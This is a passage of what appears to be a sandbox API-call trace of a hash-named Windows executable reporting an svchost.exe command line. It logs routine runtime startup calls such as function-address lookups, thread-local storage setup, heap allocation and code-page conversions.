[0176.702] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlVirtualUnwind") returned 0x7ffb2625a410 [0176.702] ResetEvent (hEvent=0x8) returned 1 [0176.702] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.705] GetProcAddress (hModule=0x7ffb26230000, lpProcName="IsDebuggerPresent") returned 0x7ffb26257460 [0176.705] ResetEvent (hEvent=0x8) returned 1 [0176.705] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.708] GetProcAddress (hModule=0x7ffb26230000, lpProcName="UnhandledExceptionFilter") returned 0x7ffb26276a20 [0176.708] ResetEvent (hEvent=0x8) returned 1 [0176.708] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.712] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetUnhandledExceptionFilter") returned 0x7ffb26256ea0 [0176.712] ResetEvent (hEvent=0x8) returned 1 [0176.712] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.715] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetStartupInfoW") returned 0x7ffb26254c00 [0176.715] ResetEvent (hEvent=0x8) returned 1 [0176.715] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.719] GetProcAddress (hModule=0x7ffb26230000, lpProcName="IsProcessorFeaturePresent") returned 0x7ffb26253d30 [0176.719] ResetEvent (hEvent=0x8) returned 1 [0176.719] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.723] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleHandleW") returned 0x7ffb26253d40 [0176.723] ResetEvent (hEvent=0x8) returned 1 [0176.723] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.726] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeSListHead") returned 0x7ffb28b721c0 [0176.726] ResetEvent (hEvent=0x8) returned 1 [0176.726] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.730] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlUnwindEx") returned 0x7ffb26256ba0 [0176.730] ResetEvent (hEvent=0x8) returned 1 [0176.730] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.733] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlPcToFileHeader") returned 0x7ffb26255170 [0176.733] ResetEvent (hEvent=0x8) returned 1 [0176.734] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.737] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RaiseException") returned 0x7ffb26254d70 [0176.737] ResetEvent (hEvent=0x8) returned 1 [0176.737] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.740] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InterlockedFlushSList") returned 0x7ffb28b72970 [0176.741] ResetEvent (hEvent=0x8) returned 1 [0176.741] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.744] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EncodePointer") returned 0x7ffb28b72780 [0176.744] ResetEvent (hEvent=0x8) returned 1 [0176.744] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.747] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x7ffb2625d750 [0176.747] ResetEvent (hEvent=0x8) returned 1 [0176.747] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.751] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsAlloc") returned 0x7ffb26253ad0 [0176.751] ResetEvent (hEvent=0x8) returned 1 [0176.751] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.754] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsGetValue") returned 0x7ffb2624b450 [0176.754] ResetEvent (hEvent=0x8) returned 1 [0176.754] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.757] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsSetValue") returned 0x7ffb2624b7d0 [0176.757] ResetEvent (hEvent=0x8) returned 1 [0176.757] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.760] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsFree") returned 0x7ffb26253e40 [0176.760] ResetEvent (hEvent=0x8) returned 1 [0176.760] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.766] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryExW") returned 0x7ffb26250dd0 [0176.766] ResetEvent (hEvent=0x8) returned 1 [0176.766] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.769] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcess") returned 0x7ffb2624b7c0 [0176.769] ResetEvent (hEvent=0x8) returned 1 [0176.770] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.773] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TerminateProcess") returned 0x7ffb26258cf0 [0176.773] ResetEvent (hEvent=0x8) returned 1 [0176.773] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.776] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ExitThread") returned 0x7ffb28b5c2a0 [0176.776] ResetEvent (hEvent=0x8) returned 1 [0176.776] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.780] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibraryAndExitThread") returned 0x7ffb26257220 [0176.780] ResetEvent (hEvent=0x8) returned 1 [0176.780] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.784] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleHandleExW") returned 0x7ffb26256b90 [0176.784] ResetEvent (hEvent=0x8) returned 1 [0176.784] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.787] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ExitProcess") returned 0x7ffb26254d80 [0176.787] ResetEvent (hEvent=0x8) returned 1 [0176.787] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.791] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleFileNameA") returned 0x7ffb26256e30 [0176.791] ResetEvent (hEvent=0x8) returned 1 [0176.791] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.794] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetACP") returned 0x7ffb2624d720 [0176.794] ResetEvent (hEvent=0x8) returned 1 [0176.794] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.798] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CompareStringW") returned 0x7ffb26252ce0 [0176.798] ResetEvent (hEvent=0x8) returned 1 [0176.798] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.802] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LCMapStringW") returned 0x7ffb2624dd00 [0176.802] ResetEvent (hEvent=0x8) returned 1 [0176.802] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.804] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTimeZoneInformation") returned 0x7ffb26253ab0 [0176.804] ResetEvent (hEvent=0x8) returned 1 [0176.805] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.807] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindClose") returned 0x7ffb2625d900 [0176.807] ResetEvent (hEvent=0x8) returned 1 [0176.807] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.811] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindFirstFileExA") returned 0x7ffb2625d950 [0176.811] ResetEvent (hEvent=0x8) returned 1 [0176.811] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.814] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0176.814] ResetEvent (hEvent=0x8) returned 1 [0176.814] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.816] GetProcAddress (hModule=0x7ffb26230000, lpProcName="IsValidCodePage") returned 0x7ffb262531d0 [0176.816] ResetEvent (hEvent=0x8) returned 1 [0176.816] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.818] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetOEMCP") returned 0x7ffb2625c840 [0176.818] ResetEvent (hEvent=0x8) returned 1 [0176.818] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.819] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCPInfo") returned 0x7ffb262531e0 [0176.819] ResetEvent (hEvent=0x8) returned 1 [0176.819] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.821] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCommandLineA") returned 0x7ffb26256d00 [0176.821] ResetEvent (hEvent=0x8) returned 1 [0176.821] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.822] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCommandLineW") returned 0x7ffb26256a00 [0176.822] ResetEvent (hEvent=0x8) returned 1 [0176.822] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.825] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetEnvironmentStringsW") returned 0x7ffb26256790 [0176.825] ResetEvent (hEvent=0x8) returned 1 [0176.825] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.826] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeEnvironmentStringsW") returned 0x7ffb262567a0 [0176.826] ResetEvent (hEvent=0x8) returned 1 [0176.826] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.828] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetEnvironmentVariableA") returned 0x7ffb26253e50 [0176.828] ResetEvent (hEvent=0x8) returned 1 [0176.828] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0176.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfea8 | out: lpSystemTimeAsFileTime=0xcfea8*(dwLowDateTime=0xf5f2d1bf, dwHighDateTime=0x1d7b3c9)) [0176.890] GetCurrentThreadId () returned 0xa30 [0176.890] GetCurrentProcessId () returned 0x148 [0176.890] QueryPerformanceCounter (in: lpPerformanceCount=0xcfeb0 | out: lpPerformanceCount=0xcfeb0*=1539680966286) returned 1 [0176.897] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0176.897] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffb25207c50 [0176.900] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0176.900] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsAlloc") returned 0x7ffb25217e50 [0176.900] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsSetValue") returned 0x7ffb25203cb0 [0176.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0176.915] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffb25207c50 [0176.915] GetProcessHeap () returned 0x5f0000 [0176.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0176.915] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsAlloc") returned 0x7ffb25217e50 [0176.915] GetLastError () returned 0x0 [0176.915] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsGetValue") returned 0x7ffb251f3780 [0176.915] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsSetValue") returned 0x7ffb25203cb0 [0176.915] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3c8) returned 0x60a220 [0176.918] SetLastError (dwErrCode=0x0) [0176.922] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1000) returned 0x60a600 [0176.923] GetStartupInfoW (in: lpStartupInfo=0xcfd30 | out: lpStartupInfo=0xcfd30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0xcff30, hStdError=0x1)) [0176.923] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0176.923] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0176.923] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0176.923] GetCommandLineA () returned="C:\\Windows\\system32\\svchost.exe" [0176.924] GetCommandLineW () returned="C:\\Windows\\system32\\svchost.exe" [0176.926] GetACP () returned 0x4e4 [0176.926] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x228) returned 0x60b610 [0176.926] IsValidCodePage (CodePage=0x4e4) returned 1 [0176.926] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcfd00 | out: lpCPInfo=0xcfd00) returned 1 [0176.926] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcf5a0 | out: lpCPInfo=0xcf5a0) returned 1 [0176.926] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0xcf2f0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0176.932] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0xcf8c0 | out: lpCharType=0xcf8c0) returned 1 [0176.935] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.935] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0xcf290, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0176.935] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0176.935] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="LCMapStringEx") returned 0x7ffb251c5350 [0176.935] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0176.935] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xcf080, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0176.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0xcf6c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0176.935] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.935] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0xcf290, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0176.935] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0176.935] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xcf080, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0176.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 